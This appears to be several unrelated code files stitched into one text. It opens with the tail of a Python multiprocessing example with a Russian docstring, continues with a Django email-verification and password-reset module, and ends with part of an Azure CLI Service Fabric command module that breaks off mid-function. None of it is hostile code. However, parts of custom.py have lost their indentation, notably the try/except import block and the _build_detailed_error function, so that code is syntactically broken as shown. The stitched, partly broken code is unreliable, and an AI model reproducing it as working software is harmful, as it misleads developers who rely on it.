    if not p.is_alive():
        print("beep finished.")
    else:
        # Worker outlived us: kill it and give it a moment to die.
        p.terminate()
        time.sleep(0.1)
        print("beep terminated.")
if __name__ == '__main__':
    # Start the 30-second worker in its own process, run the shorter main
    # loop, which then terminates the still-running worker.
    p = Process(target=sub1, args=("beep",))
    p.start()
    main(p)
    print('Main finished.')
''' Процессы можно создавать из обычных функций. Методы работы с процессами
почти все те же самые, что и для потоков из модуля threading. А вот для
синхронизации процессов и обмена данными принято использовать другие
инструменты. Речь идет об очередях (Queue) и каналах (Pipe).
Впрочем, аналоги локов, событий и семафоров, которые были в threading, здесь
тоже есть. Кроме того в модуле multiprocessing есть механизм работы с общей
памятью. Для этого в модуле есть классы переменной (Value) и массива (Array),
которые можно “обобщать” (share) между процессами. Для удобства работы с
общими переменными можно использовать классы-менеджеры (Manager). Они более
гибкие и удобные в обращении, однако более медленные. Нельзя не отметить
приятную возможность делать общими типы из модуля ctypes с помощью модуля
multiprocessing.sharedctypes.
Еще в модуле multiprocessing есть механизм создания пулов процессов. Этот
механизм очень удобно использовать для реализации шаблона Master-Worker или
для реализации параллельного Map (который в некотором смысле является частным
случаем Master-Worker).'''
|
Confirm.py | from http import HTTPStatus
from rest_framework.decorators import api_view,authentication_classes,throttle_classes
from rest_framework.throttling import UserRateThrottle,AnonRateThrottle
from datetime import datetime as dt
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from hashlib import sha224
from random import randint, shuffle
from smtplib import SMTP
from threading import Thread
from django.core.mail import EmailMessage
from datetime import timedelta
from django.utils import timezone
from django.http import HttpResponse
from django.conf import settings
from django.contrib.auth import get_user_model
from django.shortcuts import render
from django.template.loader import render_to_string
from django.urls import get_resolver
from .errors import InvalidUserModel, EmailTemplateNotFound
from .errors import NotAllFieldCompiled
from rest_framework.authentication import BasicAuthentication
# Create your views here.
@api_view(['GET', 'POST'])
@throttle_classes([UserRateThrottle, AnonRateThrottle])
@authentication_classes([BasicAuthentication])
def verify(request, email_token, token_type):
    """Consume a one-time token.

    ``token_type`` 'U_V' marks the user as verified; 'P_R' (POST only)
    resets the password from ``request.data['password']``. Every path now
    returns an HttpResponse.

    Raises:
        NotAllFieldCompiled: when the settings/user model lacks a required
            attribute (AttributeError within the handler).
    """
    try:
        user = verifyToken(email_token, token_type)
        if user is not None:
            if token_type == 'U_V':
                user.verified = True
                user.save()
                return HttpResponse('{"detail":"verified","message":"token verified"}', status=HTTPStatus.ACCEPTED, content_type='application/json')
            elif token_type == 'P_R' and request.method == 'POST':
                # .get() avoids a KeyError (HTTP 500) when the body omits the field.
                password = request.data.get('password')
                if password is not None:
                    user.set_password(password)
                    user.save()
                    return HttpResponse('{"detail":"password updated","message":"password updated try logging-in"}', status=HTTPStatus.OK, content_type='application/json')
            # BUG FIX: previously a 'P_R' token over GET, or a POST without a
            # password, fell through and returned None, which Django rejects
            # with a server error. Treat any unhandled combination as a bad
            # request (note: the token was already consumed by verifyToken).
            return HttpResponse('{"detail":"bad request","message":"unsupported token type or missing data"}', status=HTTPStatus.BAD_REQUEST, content_type='application/json')
        else:
            return HttpResponse('{"detail":"not verified","message":"token verified failed/invalid token"}', status=HTTPStatus.FORBIDDEN, content_type='application/json')
    except AttributeError:
        raise NotAllFieldCompiled('EMAIL_PAGE_TEMPLATE field not found')
def sendConfirm(user, token_type, **kwargs):
    """Create (or reuse) a one-time token for *user* and e-mail it.

    For 'U_V' tokens the user is first flagged unverified. An existing,
    still-active token of the same type is reused; an expired one is
    replaced. The mail itself is sent from a background thread.

    Args:
        user: user model instance; must expose ``email``.
        token_type: e.g. 'U_V' (user verification) or 'P_R' (password reset).
        **kwargs: optional ``token`` to use instead of generating one.

    Raises:
        InvalidUserModel: the object has no usable ``email`` attribute.
    """
    from .models import Token
    import secrets  # stdlib; function-scope import to match the file's style
    try:
        email = user.email
        if token_type == 'U_V':
            user.verified = False
            user.save()
        try:
            token = kwargs['token']
        except KeyError:
            # SECURITY FIX: the old scheme hashed `random` output (not
            # cryptographically secure, per the `secrets` module docs) over
            # an alphabet that was also missing the letter 'v'.
            # secrets.token_hex(28) yields 56 hex chars — the same length as
            # the previous sha224 hexdigest, so model field sizes still fit.
            token = secrets.token_hex(28)
        try:
            user_email = Token.objects.get(user=user, token_type=token_type)
            if user_email.is_token_active():
                # Reuse the still-valid token so earlier mails stay usable.
                token = user_email.token
            else:
                user_email.delete()
                user_email = Token.objects.create(user=user, token=token, token_type=token_type)
                user_email.save()
        except Token.DoesNotExist:
            user_email = Token.objects.create(user=user, token=token, token_type=token_type)
            user_email.save()
        # Send asynchronously so the request is not blocked on SMTP.
        t = Thread(target=sendConfirm_thread, args=(email, token, token_type))
        t.start()
    except AttributeError:
        raise InvalidUserModel('The user model you provided is invalid')
def sendConfirm_thread(email, token, token_type):
    """Render the verification e-mail and send it (runs on a worker thread).

    The recipient list is produced by splitting *email* on commas. The link
    is built as EMAIL_USER_VERIFICATION_LINK + token_type + "/" + token.

    Raises:
        NotAllFieldCompiled: when any required EMAIL_* setting is missing
            (surfaces as AttributeError on the settings object).
    """
    try:
        # sender/port/password are not used below, but reading them here
        # deliberately validates that all mail settings exist before any
        # work happens; removing them would drop that check.
        sender = settings.EMAIL_SERVER
        link = settings.EMAIL_USER_VERIFICATION_LINK
        subject = settings.EMAIL_MAIL_SUBJECT
        address = settings.EMAIL_ADDRESS
        port = settings.EMAIL_PORT
        password = settings.EMAIL_PASSWORD
    except AttributeError:
        raise NotAllFieldCompiled('Compile all the fields in the settings')
    link = link + token_type + "/" + token
    try:
        html = settings.USER_VERIFICATION_HTML_TEMPLATE[token_type]
        html = render_to_string(html, {'link': link})
        msg = EmailMessage(subject, html, address, email.split(","))
        msg.content_subtype = "html"  # Main content is now text/html
        msg.send()
    except AttributeError:
        # NOTE(review): deliberate best-effort — a missing
        # USER_VERIFICATION_HTML_TEMPLATE silently drops the mail;
        # consider logging here instead of passing.
        pass
def verifyToken(email_token, token_type):
    """Resolve a token string to its owning user, consuming the token.

    Returns the matching user when the token exists and is still active
    (the Token row is deleted as a side effect); otherwise returns None.
    An inactive token is left in place for the caller's replacement logic.
    """
    from .models import Token
    try:
        entry = Token.objects.get(token=email_token, token_type=token_type)
    except Token.DoesNotExist:
        return None
    if not entry.is_token_active():
        return None
    owner = get_user_model().objects.get(email=entry.user.email)
    entry.delete()
    return owner
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.cli.core.profiles import ResourceType, get_sdk, get_api_version
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
from azure.cli.command_modules.servicefabric._arm_deployment_utils import validate_and_deploy_arm_template
from azure.cli.command_modules.servicefabric._sf_utils import _get_resource_group_by_name, _create_resource_group_name
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from knack.log import get_logger
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
# Defaults applied by `az sf cluster create` when the caller omits an option.
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
# Port ranges opened on each node type (application + ephemeral) and the
# management endpoints.
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
# Load-balancer NAT defaults (3389 suggests RDP — confirm against the LB
# setup code, which is outside this view).
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
# Service Fabric VM extension names for the two supported OS families.
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
# Keys used in ARM template parameter files for certificate wiring
# (primary and secondary certificate variants).
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
# Maps the CLI's friendly --vm-os names to marketplace image SKUs.
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
          'UbuntuServer1604': '16.04-LTS',
          'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
          'WindowsServer2016Datacenter': '2016-Datacenter',
          'WindowsServer1709': "Datacenter-Core-1709-smalldisk",
          'WindowsServer1709withContainers': "Datacenter-Core-1709-with-Containers-smalldisk",
          'WindowsServer1803withContainers': "Datacenter-Core-1803-with-Containers-smalldisk",
          'WindowsServer1809withContainers': "Datacenter-Core-1809-with-Containers-smalldisk",
          'WindowsServer2019Datacenter': "2019-Datacenter",
          'WindowsServer2019DatacenterwithContainers': "2019-Datacenter-Core-with-Containers"}
def list_cluster(client, resource_group_name=None):
    """List clusters in *resource_group_name*, or across the whole
    subscription when no resource group is given."""
    if resource_group_name:
        return client.list_by_resource_group(resource_group_name=resource_group_name)
    return client.list()
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
                client,
                resource_group_name,
                location,
                certificate_subject_name=None,
                parameter_file=None,
                template_file=None,
                cluster_name=None,
                vault_resource_group_name=None,
                vault_name=None,
                certificate_file=None,
                certificate_password=None,
                certificate_output_folder=None,
                secret_identifier=None,
                vm_user_name=None,
                vm_password=None,
                cluster_size=None,
                vm_sku=None,
                vm_os=None):
    """Create a Service Fabric cluster, either from the built-in default
    template or from a user-supplied template/parameter file pair.

    Returns:
        dict with 'vm_user_name', the created 'cluster' resource, and a
        'certificate' dict (file, vault_id, certificate_identifier,
        thumbprint).

    Raises:
        CLIError: on any invalid/mutually-exclusive argument combination.
    """
    cli_ctx = cmd.cli_ctx
    if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
        raise CLIError(
            '\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
    if certificate_output_folder and certificate_file:
        raise CLIError(
            '\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
    if secret_identifier:
        # BUG FIX: 'certificate_output_folder' was tested twice in this
        # condition and listed twice in the message; the duplicates are
        # removed (the intended exclusive set is unchanged).
        if certificate_output_folder or certificate_file or vault_resource_group_name or certificate_password:
            raise CLIError(
                '\'--certificate-output-folder\' , \'--certificate-file\', \'vault_resource_group_name\', \'certificate_password\' can not be specified, ' +
                'when \'--secret-identifier\' is specified')
    if parameter_file or template_file:
        if parameter_file is None or template_file is None:
            raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
                           '\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
        if cluster_size or vm_sku or vm_user_name:
            raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
    else:
        # Default-template path: fill in every omitted VM/cluster option.
        if vm_password is None:
            raise CLIError('\'--vm-password\' could not be None')
        if cluster_size is None:
            cluster_size = DEFAULT_CLUSTER_SIZE
        if vm_sku is None:
            vm_sku = DEFAULT_SKU
        if vm_os is None:
            vm_os = DEFAULT_OS
        if vm_user_name is None:
            vm_user_name = DEFAULT_ADMIN_USER_NAME
    rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
    if rg is None:
        _create_resource_group_name(cli_ctx, resource_group_name, location)
    if vault_name is None:
        # Derive a Key Vault name from the resource group: keep only
        # letters/digits/hyphens, capped at 21 characters.
        vault_name = resource_group_name
        name = ""
        for n in vault_name:
            if n.isalpha() or n == '-' or n.isdigit():
                name += n
            if len(name) >= 21:
                break
        vault_name = name
    if vault_resource_group_name is None:
        vault_resource_group_name = resource_group_name
    if cluster_name is None:
        cluster_name = resource_group_name
    if certificate_file:
        _, file_extension = os.path.splitext(certificate_file)
        if file_extension is None or file_extension.lower() != '.pfx'.lower():
            raise CLIError('\'--certificate_file\' should be a valid pfx file')
    vault_id = None
    certificate_uri = None
    cert_thumbprint = None
    output_file = None
    if parameter_file is None:
        # Built-in template: provision the certificate ourselves and fill
        # the template parameters from its coordinates.
        vm_os = os_dic[vm_os]
        reliability_level = _get_reliability_level(cluster_size)
        result = _create_certificate(cmd,
                                     cli_ctx,
                                     resource_group_name,
                                     certificate_file,
                                     certificate_password,
                                     vault_name,
                                     vault_resource_group_name,
                                     certificate_output_folder,
                                     certificate_subject_name,
                                     secret_identifier)
        vault_id = result[0]
        certificate_uri = result[1]
        cert_thumbprint = result[2]
        output_file = result[3]
        linux = None
        if vm_os == '16.04-LTS':
            linux = True
        template = _modify_template(linux)
        parameters = _set_parameters_for_default_template(cluster_location=location,
                                                          cluster_name=cluster_name,
                                                          admin_password=vm_password,
                                                          certificate_thumbprint=cert_thumbprint,
                                                          vault_id=vault_id,
                                                          certificate_id=certificate_uri,
                                                          reliability_level=reliability_level,
                                                          admin_name=vm_user_name,
                                                          cluster_size=cluster_size,
                                                          durability_level=DEFAULT_DURABILITY_LEVEL,
                                                          vm_sku=vm_sku,
                                                          os_type=vm_os,
                                                          linux=linux)
    else:
        # Customize-template path: the parameter file supplies the
        # certificate wiring; read it back for the return payload.
        parameters, output_file = _set_parameters_for_customize_template(cmd,
                                                                         cli_ctx,
                                                                         resource_group_name,
                                                                         certificate_file,
                                                                         certificate_password,
                                                                         vault_name,
                                                                         vault_resource_group_name,
                                                                         certificate_output_folder,
                                                                         certificate_subject_name,
                                                                         secret_identifier,
                                                                         parameter_file)
        vault_id = parameters[SOURCE_VAULT_VALUE]['value']
        certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
        cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
        template = get_file_json(template_file)
    validate_and_deploy_arm_template(cmd, resource_group_name, template, parameters)
    output_dict = {}
    output_dict['vm_user_name'] = vm_user_name
    output_dict['cluster'] = client.get(resource_group_name, cluster_name)
    output_dict['certificate'] = {'certificate_file': output_file,
                                  'vault_id': vault_id,
                                  'certificate_identifier': certificate_uri,
                                  'thumbprint': cert_thumbprint}
    return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
                 client,
                 resource_group_name,
                 cluster_name,
                 certificate_file=None,
                 certificate_password=None,
                 vault_name=None,
                 vault_resource_group_name=None,
                 certificate_output_folder=None,
                 certificate_subject_name=None,
                 secret_identifier=None):
    """Provision an application certificate and install it on every VMSS of
    the cluster, then return the (otherwise unchanged) cluster resource."""
    # _create_certificate returns (vault_id, certificate_uri, thumbprint,
    # output_file); only the first two are needed here.
    vault_id, secret_url, _thumbprint, _output_file = _create_certificate(
        cmd,
        cmd.cli_ctx,
        resource_group_name,
        certificate_file,
        certificate_password,
        vault_name,
        vault_resource_group_name,
        certificate_output_folder,
        certificate_subject_name,
        secret_identifier)
    _add_cert_to_all_vmss(cmd.cli_ctx, resource_group_name, None, vault_id, secret_url)
    return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
                    resource_group_name,
                    cluster_name,
                    is_admin=False,
                    thumbprint=None,
                    certificate_common_name=None,
                    certificate_issuer_thumbprint=None,
                    admin_client_thumbprints=None,
                    readonly_client_thumbprints=None,
                    client_certificate_common_names=None):
    """Authorize client certificate(s) on the cluster, by thumbprint or by
    common name. The parameter groups are mutually exclusive, mirroring the
    CLI argument groups; violations raise CLIError."""
    if thumbprint:
        if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
            raise CLIError(
                "--thumbprint can only specified alone or with --is-admin")
    if certificate_common_name or certificate_issuer_thumbprint:
        if certificate_issuer_thumbprint is None or certificate_common_name is None:
            raise CLIError(
                "Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
        if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
            raise CLIError(
                "Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
    if admin_client_thumbprints or readonly_client_thumbprints:
        if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
            raise CLIError(
                "Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
    if client_certificate_common_names:
        if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints:  # pylint: disable=too-many-boolean-expressions
            raise CLIError(
                "\'--client-certificate-commonNames\' can only be specified alone")
    cluster = client.get(resource_group_name, cluster_name)

    def _add_thumbprint(cluster, is_admin, thumbprint):
        # Replace any existing entry with the same thumbprint (case-insensitive).
        remove = []
        for t in cluster.client_certificate_thumbprints:
            if t.certificate_thumbprint.lower() == thumbprint.lower():
                remove.append(t)
        for t in remove:
            cluster.client_certificate_thumbprints.remove(t)
        # NOTE(review): positional construction assumes the model argument
        # order (is_admin, certificate_thumbprint) — confirm against the SDK.
        cluster.client_certificate_thumbprints.append(
            ClientCertificateThumbprint(is_admin, thumbprint))

    def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
        # BUG FIX: `remove` was referenced before assignment whenever no
        # existing entry matched; initialize it.
        remove = None
        for t in cluster.client_certificate_common_names:
            if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
                remove = t
        if remove:
            cluster.client_certificate_common_names.remove(remove)
        # BUG FIX: client_certificate_common_names is a list — lists have no
        # .add(); use .append().
        cluster.client_certificate_common_names.append(ClientCertificateCommonName(
            is_admin, certificate_common_name, certificate_issuer_thumbprint))
        return cluster.client_certificate_common_names

    if thumbprint:
        _add_thumbprint(cluster, is_admin, thumbprint)
    if admin_client_thumbprints or readonly_client_thumbprints:
        if admin_client_thumbprints:
            for t in admin_client_thumbprints:
                _add_thumbprint(cluster, True, t)
        if readonly_client_thumbprints:
            for t in readonly_client_thumbprints:
                _add_thumbprint(cluster, False, t)
    if certificate_common_name:
        _add_common_name(cluster, is_admin, certificate_common_name,
                         certificate_issuer_thumbprint)
    if client_certificate_common_names:
        for common_name in client_certificate_common_names:
            if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
                cluster.client_certificate_common_names = _add_common_name(
                    cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
            else:
                raise CLIError('client_certificate_common_names is invalid')
    patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
                                            client_certificate_common_names=cluster.client_certificate_common_names)
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
                       resource_group_name,
                       cluster_name,
                       thumbprints=None,
                       certificate_common_name=None,
                       certificate_issuer_thumbprint=None,
                       client_certificate_common_names=None):
    """Revoke client certificate(s), by thumbprint(s) or by common name.
    The parameter groups are mutually exclusive; violations raise CLIError."""
    if thumbprints:
        if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
            raise CLIError("--thumbprint can only specified alone")
    if certificate_common_name or certificate_issuer_thumbprint:
        if certificate_issuer_thumbprint is None or certificate_common_name is None:
            raise CLIError(
                "Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
        if thumbprints or client_certificate_common_names:
            raise CLIError(
                "Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
    if client_certificate_common_names:
        if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
            raise CLIError(
                "\'--client-certificate-commonNames\' can only be specified alone")
    cluster = client.get(resource_group_name, cluster_name)

    def _remove_thumbprint(cluster, thumbprint):
        remove = None
        for t in cluster.client_certificate_thumbprints:
            if t.certificate_thumbprint.lower() == thumbprint.lower():
                remove = t
        if remove:
            cluster.client_certificate_thumbprints.remove(remove)
        return cluster.client_certificate_thumbprints

    def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
        remove = None
        for t in cluster.client_certificate_common_names:
            if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
                remove = t
        if remove:
            cluster.client_certificate_common_names.remove(remove)
        # BUG FIX: previously returned cluster.certificate_issuer_thumbprint,
        # an attribute that does not exist on the cluster model; callers
        # assign this return value back to client_certificate_common_names.
        return cluster.client_certificate_common_names

    # BUG FIX: when --thumbprints was omitted the old code still called
    # _remove_thumbprint(cluster, None), crashing on None.lower(); only act
    # when a value was actually given.
    if thumbprints:
        if isinstance(thumbprints, list):
            for t in thumbprints:
                cluster.client_certificate_thumbprints = _remove_thumbprint(
                    cluster, t)
        else:
            _remove_thumbprint(cluster, thumbprints)
    if certificate_common_name:
        _remove_common_name(cluster, certificate_common_name,
                            certificate_issuer_thumbprint)
    if client_certificate_common_names:
        for common_name in client_certificate_common_names:
            if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
                cluster.client_certificate_common_names = _remove_common_name(cluster,
                                                                              common_name['certificateCommonName'],
                                                                              common_name['certificateIssuerThumbprint'])
            else:
                raise CLIError('client_certificate_common_names is invalid')
    patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
                                            client_certificate_common_names=cluster.client_certificate_common_names)
    return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
                     client,
                     resource_group_name,
                     cluster_name,
                     certificate_file=None,
                     certificate_password=None,
                     vault_name=None,
                     vault_resource_group_name=None,
                     certificate_output_folder=None,
                     certificate_subject_name=None,
                     secret_identifier=None):
    """Add a secondary cluster certificate: provision it (Key Vault),
    install it on every VMSS, then record it as thumbprint_secondary on the
    cluster resource.

    Raises:
        CLIError: if the cluster is unsecured, or the Service Fabric VM
            extension cannot be found on the primary node type's VMSS.
    """
    cli_ctx = cmd.cli_ctx
    cluster = client.get(resource_group_name, cluster_name)
    if cluster.certificate is None:
        raise CLIError("Unsecure cluster is not allowed to add certificate")
    # _create_certificate returns (vault_id, secret_url, thumbprint, output_file).
    result = _create_certificate(cmd,
                                 cli_ctx,
                                 resource_group_name,
                                 certificate_file,
                                 certificate_password,
                                 vault_name,
                                 vault_resource_group_name,
                                 certificate_output_folder,
                                 certificate_subject_name,
                                 secret_identifier)
    vault_id = result[0]
    secret_url = result[1]
    thumbprint = result[2]
    compute_client = compute_client_factory(cli_ctx)
    primary_node_type = [n for n in cluster.node_types if n.is_primary is True][0]
    # The extension lookup is a sanity check that this really is a Service
    # Fabric VMSS before touching every scale set below.
    vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, primary_node_type.name)
    fabric_ext = _get_sf_vm_extension(vmss)
    if fabric_ext is None:
        raise CLIError("Failed to find service fabric extension")
    # add cert and start vmss update
    _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster.cluster_id, vault_id, secret_url, is_cluster_cert=True, thumbprint=thumbprint)
    # cluster update: publish the new cert as the secondary thumbprint
    patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
    patch_request.certificate.thumbprint_secondary = thumbprint
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
    """Remove one cluster certificate by thumbprint.

    Removing the secondary clears thumbprint_secondary; removing the primary
    promotes the secondary to primary.

    Raises:
        CLIError: if the cluster is unsecured, or the thumbprint matches
            neither certificate.
    """
    cluster = client.get(resource_group_name, cluster_name)
    if cluster.certificate is None:
        raise CLIError("Unsecure cluster is not allowed to remove certificate")
    # BUG FIX: thumbprint_secondary may be None (no secondary cert), which
    # previously crashed on .lower(); compare only when present.
    secondary = cluster.certificate.thumbprint_secondary
    if secondary and secondary.lower() == thumbprint.lower():
        cluster.certificate.thumbprint_secondary = None
    elif cluster.certificate.thumbprint.lower() == thumbprint.lower():
        # Promote the secondary (possibly None) to primary.
        cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
        cluster.certificate.thumbprint_secondary = None
    else:
        raise CLIError(
            "Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
    # The redundant `patch_request.certificate = cluster.certificate`
    # re-assignment after the constructor was removed.
    patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
    return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
    """Scale a node type's VM scale set up by N nodes, then mirror the new
    capacity into the SFRP cluster model.

    Raises:
        CLIError: for a non-positive count or an unknown node type.
    """
    cli_ctx = cmd.cli_ctx
    number_of_nodes_to_add = int(number_of_nodes_to_add)
    if number_of_nodes_to_add <= 0:
        raise CLIError("--number-of-nodes-to-add must be greater than 0")
    compute_client = compute_client_factory(cli_ctx)
    cluster = client.get(resource_group_name, cluster_name)
    node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    # BUG FIX: a list comprehension is never None, so the old `is None`
    # check could not fire and an unknown node type crashed with an
    # IndexError below instead of this CLIError.
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    node_type = node_types[0]
    vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
    vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
    # update vmss
    vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
        resource_group_name, vmss.name, vmss)
    LongRunningOperation(cli_ctx)(vmss_poll)
    # update cluster
    node_type.vm_instance_count = vmss.sku.capacity
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
    """Scale a node type's VM scale set down by N nodes — never below the
    instance count the cluster's reliability level requires — then mirror
    the new capacity into the SFRP cluster model.

    Raises:
        CLIError: for a non-positive count, an unknown node type, or a
            removal that would violate the reliability level.
    """
    cli_ctx = cmd.cli_ctx
    number_of_nodes_to_remove = int(number_of_nodes_to_remove)
    if number_of_nodes_to_remove <= 0:
        raise CLIError("--number-of-nodes-to-remove must be greater than 0")
    compute_client = compute_client_factory(cli_ctx)
    cluster = client.get(resource_group_name, cluster_name)
    node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    # BUG FIX: a list comprehension is never None, so the old `is None`
    # check could not fire and an unknown node type crashed with an
    # IndexError below instead of this CLIError.
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    node_type = node_types[0]
    reliability_required_instance_count = _get_target_instance(cluster.reliability_level)
    vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
    vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
    if vmss.sku.capacity < reliability_required_instance_count:
        raise CLIError("Can't delete node since current reliability level is {} requires at least {} nodes.".format(
            cluster.reliability_level,
            reliability_required_instance_count))
    # update vmss
    vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
        resource_group_name, vmss.name, vmss)
    LongRunningOperation(cli_ctx)(vmss_poll)
    # update cluster
    node_type.vm_instance_count = vmss.sku.capacity
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
